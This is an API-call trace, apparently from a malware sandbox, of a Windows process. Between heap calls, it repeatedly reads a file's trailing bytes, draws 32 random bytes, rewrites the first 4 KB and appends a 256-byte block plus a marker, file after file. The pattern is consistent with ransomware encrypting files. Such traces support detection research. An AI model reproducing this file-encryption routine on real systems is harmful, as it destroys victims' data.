GetProcessHeap () returned 0x4f10000 [0086.557] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.558] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.558] GetProcessHeap () returned 0x4f10000 [0086.558] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.559] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.559] GetProcessHeap () returned 0x4f10000 [0086.560] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.560] GetProcessHeap () returned 0x4f10000 [0086.560] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.561] GetProcessHeap () returned 0x4f10000 [0086.561] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.561] GetProcessHeap () returned 0x4f10000 [0086.561] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.561] GetProcessHeap () returned 0x4f10000 [0086.561] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.561] GetProcessHeap () returned 0x4f10000 [0086.561] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.561] SetFilePointerEx (in: hFile=0xa04, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.561] WriteFile (in: hFile=0xa04, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.561] WriteFile (in: hFile=0xa04, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.561] GetProcessHeap () returned 0x4f10000 [0086.561] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.561] GetProcessHeap () returned 0x4f10000 [0086.561] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.561] GetProcessHeap () returned 0x4f10000 [0086.561] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.561] CloseHandle (hObject=0xa04) returned 1 [0086.563] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 163 [0086.563] SetFilePointerEx (in: hFile=0xa08, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.563] ReadFile (in: hFile=0xa08, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.563] SetFilePointerEx (in: hFile=0xa08, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.563] GetProcessHeap () returned 0x4f10000 [0086.563] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.563] GetProcessHeap () returned 0x4f10000 [0086.563] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.563] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.563] GetProcessHeap () returned 0x4f10000 [0086.563] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.563] ReadFile (in: hFile=0xa08, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0086.622] SetFilePointerEx (in: hFile=0xa08, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.622] WriteFile (in: hFile=0xa08, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0086.622] GetProcessHeap () returned 0x4f10000 [0086.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.622] GetProcessHeap () returned 0x4f10000 [0086.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.622] GetProcessHeap () returned 0x4f10000 [0086.622] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.622] GetProcessHeap () returned 0x4f10000 [0086.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.622] GetProcessHeap () returned 0x4f10000 [0086.622] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.622] GetProcessHeap () returned 0x4f10000 [0086.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.622] GetProcessHeap () returned 0x4f10000 [0086.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.623] GetProcessHeap () returned 0x4f10000 [0086.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.624] GetProcessHeap () returned 0x4f10000 [0086.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.625] GetProcessHeap () returned 0x4f10000 [0086.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.626] GetProcessHeap () returned 0x4f10000 [0086.626] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.627] GetProcessHeap () returned 0x4f10000 [0086.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.627] GetProcessHeap () returned 0x4f10000 [0086.627] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.627] GetProcessHeap () returned 0x4f10000 [0086.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.627] GetProcessHeap () returned 0x4f10000 [0086.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.627] GetProcessHeap () returned 0x4f10000 [0086.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.627] GetProcessHeap () returned 0x4f10000 [0086.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.627] GetProcessHeap () returned 0x4f10000 [0086.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.627] SetFilePointerEx (in: hFile=0xa08, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.627] WriteFile (in: hFile=0xa08, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.627] WriteFile (in: hFile=0xa08, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.627] GetProcessHeap () returned 0x4f10000 [0086.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.627] GetProcessHeap () returned 0x4f10000 [0086.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.627] GetProcessHeap () returned 0x4f10000 [0086.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.627] CloseHandle (hObject=0xa08) returned 1 [0086.629] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 164 [0086.629] SetFilePointerEx (in: hFile=0xa0c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.629] ReadFile (in: hFile=0xa0c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.629] SetFilePointerEx (in: hFile=0xa0c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 